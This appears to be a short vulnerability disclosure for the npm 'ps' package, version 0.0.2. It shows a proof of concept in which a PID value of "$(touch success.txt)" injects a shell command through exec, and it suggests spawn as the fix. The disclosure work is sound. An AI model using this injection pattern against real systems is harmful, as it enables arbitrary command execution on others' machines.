I would like to report a command injection in ps package.
It allows attacker to inject arbitrary OS commands instead of PID numbers.
module name: psversion:0.0.2npm page: https://www.npmjs.com/package/ps
A Node.js module for looking up running processes.
39 downloads in the last week
The ps package expects a valid PID number, but an attacker can inject arbitrary commands instead.
var ps = require('ps');
ps.lookup({ pid: "$(touch success.txt)" }, function(err, proc) { // this method is vulnerable to command injection
if (err) {throw err;}
if (proc) {
console.log(proc); // Process name, something like "node" or "bash"
} else {
console.log('No such process');
}
});
N/A replace exec with spawn
If the attacker can control the PID, she can inject arbitrary OS commands.